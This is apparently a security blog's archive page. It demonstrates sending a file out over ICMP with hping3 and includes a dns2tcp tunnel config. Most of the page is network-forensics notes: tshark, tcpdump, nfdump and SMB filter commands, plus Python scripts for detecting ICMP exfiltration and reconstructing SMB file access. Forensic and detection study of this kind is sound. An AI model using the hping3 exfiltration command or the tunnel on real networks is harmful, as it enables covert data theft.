Monthly archive: June 2016

Data exfiltration over ICMP

hping3 on Kali Linux

-E  file to send
-1  use ICMP
-u  tell you when --file reached EOF and prevent rewind
-i  send ICMP every 10 seconds (slow)
-d Destination IP

root@kali:~# hping3 -E dns2tcp.txt -1 -u -i 10 -d 95
HPING (eth0 icmp mode set, 28 headers + 95 data bytes
[main] memlockall(): Success
Warning: can’t disable memory paging!
len=123 ip= ttl=128 id=27778 icmp_seq=0 rtt=3.2 ms
len=123 ip= ttl=128 id=27806 icmp_seq=1 rtt=3.1 ms
len=123 ip= ttl=128 id=27852 icmp_seq=2 rtt=2.9 ms
EOF reached, wait some second than press ctrl+c
len=123 ip= ttl=128 id=27877 icmp_seq=3 rtt=2.6 ms

Data in the file sent, "dns2tcp.txt":

root@kali:~# cat dns2tcp.txt

cat dns2tcpdrc

listen =
port = 53
user = nobody
chroot = /tmp/
domain =
resources = ssh:
dns2tcpd -F -d 3 -f /dns2tcpdrc


Monitor on the receiving end using Wireshark


ICMP display filter


The first session contains the first part of the original file


The second session carries the rest of the file, etc.
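As an added example (not code from the original post), a small Python script that does on captured frames what the Wireshark screenshots show by hand: it reassembles ICMP echo-request payloads per source/destination/identifier, ordered by icmp_seq, and flags streams whose payload sizes do not look like a normal ping. The sample frames, addresses, the 95-byte chunking and the size heuristic are my own constructions.

```python
import struct

def build_echo_frame(src, dst, ident, seq, payload):
    """Constructed Ethernet/IPv4/ICMP echo request (checksums left 0; the parser ignores them)."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload
    ip_src, ip_dst = (bytes(int(o) for o in a.split(".")) for a in (src, dst))
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 1, 0, 64, 1, 0, ip_src, ip_dst)
    return b"\x00" * 12 + b"\x08\x00" + ip + icmp

def parse_frame(frame):
    """Return (src, dst, icmp_type, ident, seq, payload) for an IPv4/ICMP frame, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 1:  # IP protocol 1 = ICMP
        return None
    total_len = struct.unpack("!H", ip[2:4])[0]
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    icmp = ip[ihl:total_len]
    itype, _code, _csum, ident, seq = struct.unpack("!BBHHH", icmp[:8])
    return src, dst, itype, ident, seq, icmp[8:]

def reassemble_echo_streams(frames):
    """Group echo-request payloads per (src, dst, ident) and order them by icmp_seq."""
    streams = {}
    for frame in frames:
        p = parse_frame(frame)
        if p is None or p[2] != 8:  # echo request only
            continue
        src, dst, _, ident, seq, payload = p
        streams.setdefault((src, dst, ident), {})[seq] = payload
    return {k: [v[s] for s in sorted(v)] for k, v in streams.items()}

def flag_exfil_candidates(streams, normal_sizes=(32, 56), min_bytes=200):
    """Heuristic (my assumption): ping tools send fixed-size payloads, so odd sizes plus volume stand out."""
    hits = {}
    for key, chunks in streams.items():
        total = sum(len(c) for c in chunks)
        if total >= min_bytes and any(len(c) not in normal_sizes for c in chunks):
            hits[key] = b"".join(chunks)  # reassembled content for the analyst
    return hits

# Constructed sample: a 95-byte-per-packet transfer like the hping3 run above, plus a normal 56-byte ping.
SAMPLE_FILE = b"listen = 0.0.0.0\nport = 53\nuser = nobody\nchroot = /tmp/\n" * 5
EXFIL = [build_echo_frame("10.0.0.5", "10.0.0.9", 0x1234, i, SAMPLE_FILE[i * 95:(i + 1) * 95])
         for i in range((len(SAMPLE_FILE) + 94) // 95)]
PING = [build_echo_frame("10.0.0.7", "10.0.0.9", 0x42, i, struct.pack("!Q", 1000 + i) + bytes(range(0x10, 0x40)))
        for i in range(4)]
```

Feed it frames read from a pcap (for example via a pcap library) in place of EXFIL + PING; the reassembled bytes of a flagged stream are what the Wireshark follow-up above recovers session by session.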

Network Forensics Tools & Commands

Sort & Uniq

| sort | uniq -c | sort -nr


tshark -r file -Y <display filter> -T fields -e <fieldname>

tshark -r /cases/*.pcap -Y ftp -T fields -e ip.src -e ip.dst | sort | uniq -c | sort -nr

  • Identify search strings

tshark -n -r /cases/*.pcap -Y ' contains "google" and http.request'

  • Determine POSTs to a domain

tshark -n -r /cases/*.pcap -Y ' contains "dropbox.xom" and http.request.method == "POST"'

  • Observe the content of a given frame number

tshark -n -x -r /cases/*.pcap -Y 'frame.number==27757'

  • Identify TCP stream number

tshark -n -x -r /cases/*.pcap -Y 'frame.number==27757' -T fields -e

  • Extract base64 data from stream

tshark -n -r /cases/*.pcap -Y '' -T fields -e tcp.segment_data > /cases/extract.txt

  • Analyse web URL requests

tshark -n -r /cases/*.pcap -T fields -E separator=/t -e frame.number -e frame.time -e http.referer -e http.cookie -Y 'http.request.uri contains "dropbox"'


md5sum cases.pcap


sudo tcpdump -n -i eth0 -s 0 "arp"

sudo tcpdump -n -i eth0 -s 0 "arp and not ether dst ff:ff:ff:ff:ff:ff"

sudo tcpdump -n -i eth0 -s 0 -w /cases/scan.pcap

sudo tcpdump -n -i eth0 -s 0 -w /cases/scan.pcap "net"


  • List pcap filename/md5/start/end capture times

capinfos -T -H -a -e *.pcap /cases/*


editcap -A '2015-11-15 00:00:00' -B '2015-11-16 00:00:00' /cases/*.pcap ~/smaller.pcap


  • Encode to Base64

cat file | base64 > file.txt

  • URL Base64 decode

Obtain the base64 data from Follow Stream in Wireshark and save it to a file

cat base64-from-url.txt | > native-base64.txt

Decode the base64 data into a new file

base64 -di native-base64.txt > decode-base64.bin

  • Check the intended file type

file decode-base64.bin

unzip -t decode-base64.bin

certutil -decode file.txt test.exe


sudo arp-scan -l

Wireshark filters

arp and not eth.dst == ff:ff:ff:ff:ff:ff

http.request and contains "google"

http.request.method == "post" and contains ""


  • Order by amount of bytes, aggregate on protocol type

nfdump -O bytes -o extended -R cases/ 'ip' -A proto

  • Show only sessions with the SYN flag, order by packets, aggregate on src & dst IPs

nfdump -O packets -R cases/ -A srcip,dstip 'proto tcp and src ip and flags S and not flags AFRPU'

  • Example with custom format and filter

nfdump -O packets -A dstip -t '2015/07/15-2015/08/15' -R cases/ -o 'fmt:%da %pkt %fl %bpp' 'proto tcp and src ip and flags S and not flags AFRPU and (dst ip or dst ip or dst ip'

  • Output formats

-o long, extended

-o "fmt:%sa %da"

Tag   Description
%ts   Start Time – first seen
%te   End Time – last seen
%td   Duration
%pr   Protocol
%sa   Source Address
%da   Destination Address
%sap  Source Address:Port
%dap  Destination Address:Port
%sp   Source Port
%dp   Destination Port
%sas  Source AS
%das  Destination AS
%in   Input Interface num
%out  Output Interface num
%pkt  Packets
%byt  Bytes
%fl   Flows
%flg  TCP Flags
%tos  Tos
%bps  bps – bits per second
%pps  pps – packets per second
%bpp  bpp – Bytes per packet

-B  flow direction based on port number: >1024 is the client, <1024 the server

nfdump -B -O tstart -o extended -R 2013/ -o 'fmt:%ts %te %sa %da %d' 'proto tcp and src ip and flags S and not flags AFRPU'

–enable referrer

SMB protocol Wireshark filters

SMB sessions stay active until:

- The network connection times out
- The user closes the session
- The user de-authenticates
- The connection fails a server-side security check

Protocol Negotiation  "smb.cmd == 0x72"

LANMAN/ NTLM negotiation

Session Establishment  "smb.cmd == 0x73"

The spnego.negResult field indicates whether authentication was successful (result = 0x00).

The Process ID gives an indication of whether authentication was initiated by a core system process (< 1000) or a user-level process (> 1000).

All sessions are uniquely identified by the Multiplex ID, so client and server can pair request and response packets.

When authentication is successful a User ID is added, which is only valid during the same SMB session.

Accessing Service  "smb.cmd == 0x75"

Request access to resource

The server checks the request; if successful a Tree ID is added.

Network Directory  "smb.cmd == 0x32 && smb.trans2.cmd == 0x0005 && smb.qpi_loi == 1004"

Opening a file  "smb.cmd == 0xa2"

If a client is permitted access to a file, the server returns a File ID (FID). This value should not be used to track file access; instead use:

smb.cmd == 0xa2 and !smb.fid and smb.file

Create and Request  "smb.cmd == 0xa2" and !smb.fid and smb.file

Locking file for access  "smb.cmd == 0x24"

Reading from file  "smb.cmd == 0x2e"

Closing a file  "smb.cmd == 0x04"

Tree Disconnect  "smb.cmd == 0x71"

Uses corresponding Tree ID

Logoff  "smb.cmd == 0x74"

Uses corresponding UID & PID

Process ID == 996 == 0x03e4
User ID  smb.uid
Tree ID  smb.tid
File ID  smb.fid
  • Export objects from SMB in Wireshark

Wireshark -> File -> Export Objects -> SMB/SMB2
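Added example, not code from the original post: a Python script that applies the advice above (track file access by the name in the NT Create request rather than by FID, because a FID value is reused after Close) to tab-separated field output from tshark. The assumed `-e` field list, the UID/TID/FID values and the frames in the sample are constructed by me.

```python
# Constructed sample in the layout of `tshark -T fields -E separator=/t -e frame.number -e smb.cmd
# -e smb.flags.response -e smb.uid -e smb.tid -e smb.fid -e smb.file` (this -e list is my assumption,
# not a command from the page). The same FID value 0x4001 is handed out twice for different files.
SAMPLE = """\
10\t0x73\t1\t2048\t0\t\t
12\t0x75\t1\t2048\t1\t\t
14\t0xa2\t0\t2048\t1\t\t\\secret\\payroll.xlsx
15\t0xa2\t1\t2048\t1\t0x4001\t
16\t0x2e\t0\t2048\t1\t0x4001\t
18\t0x04\t0\t2048\t1\t0x4001\t
20\t0xa2\t0\t2048\t1\t\t\\public\\readme.txt
21\t0xa2\t1\t2048\t1\t0x4001\t
22\t0x2e\t0\t2048\t1\t0x4001\t
24\t0x04\t0\t2048\t1\t0x4001\t
26\t0x71\t0\t2048\t1\t\t
28\t0x74\t0\t2048\t0\t\t
"""

ACTIONS = {0xa2: "open", 0x2e: "read", 0x04: "close"}  # SMB1 command codes listed above

def parse_records(text):
    """Split tab-separated tshark field lines into dicts; smb.cmd may print as hex or decimal."""
    rows = []
    for line in text.splitlines():
        if line.strip():
            frame, cmd, resp, uid, tid, fid, path = (line.split("\t") + [""] * 7)[:7]
            rows.append({"frame": int(frame), "cmd": int(cmd, 0), "response": resp in ("1", "True"),
                         "uid": uid, "tid": tid, "fid": fid, "file": path})
    return rows

def file_access_timeline(rows):
    """Resolve every FID to the path from its NT Create request so that a FID value reused after
    Close is still attributed to the right file. Returns (frame, uid, action, path) tuples."""
    pending, open_files, events = {}, {}, []
    for r in rows:
        session = (r["uid"], r["tid"])
        handle = session + (r["fid"],)
        if r["cmd"] == 0xa2 and not r["response"]:
            pending[session] = r["file"]                    # the name travels in the request ...
        elif r["cmd"] == 0xa2 and r["fid"]:
            open_files[handle] = pending.pop(session, "?")  # ... and the FID in the response
            events.append((r["frame"], r["uid"], "open", open_files[handle]))
        elif r["cmd"] in (0x2e, 0x04) and not r["response"]:
            events.append((r["frame"], r["uid"], ACTIONS[r["cmd"]], open_files.get(handle, "?")))
            if r["cmd"] == 0x04:
                open_files.pop(handle, None)
    return events
```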

Collecting log evidence

Firewall files

IDS files

-d         destination ip
-i         input interface
-o         output interface
-p         layer 4 proto
--dport    destination port
--syn      match packets with only SYN flags
-j LOG     Log matched traffic
-j REJECT  Reject matched traffic

SSL Traffic

  • Profile client encryption ciphers

tshark -n -r /cases/*pcap -Y 'ssl.handshake.type == 1' -T fields -e ip.src -e ssl.record.version -e ssl.handshake.ciphersuite > /cases/ssl_ciphersuites_by_ip.txt

cat /cases/ssl_ciphersuites_by_ip.txt | awk '{print $3}' | sort | uniq -c | sort -nr

  • Identify SSL certificate subject

tshark -n -r /cases/*pcap -Y 'ssl.handshake.certificate' -T fields -E separator=\| -E aggregator=\| -e x509ce.dNSName -e x509sat.teletexString -e x509sat.uTF8String -e x509sat.universalString -e x509sat.IA5String | tr -s \| '\n' | sort | uniq -c | sort -nr


  • Search PCAP for strings

ngrep -I dump6.pcap -w 'root' -N -t -q

  • Search PCAP for hex value

ngrep -I dump6.pcap -xX '0xc5d5e5f55666768696a6b6c6d6e6' -N -t -q


  • Extract files (automatic file carving) from a pcap

tcpxtract -f dump3.pcap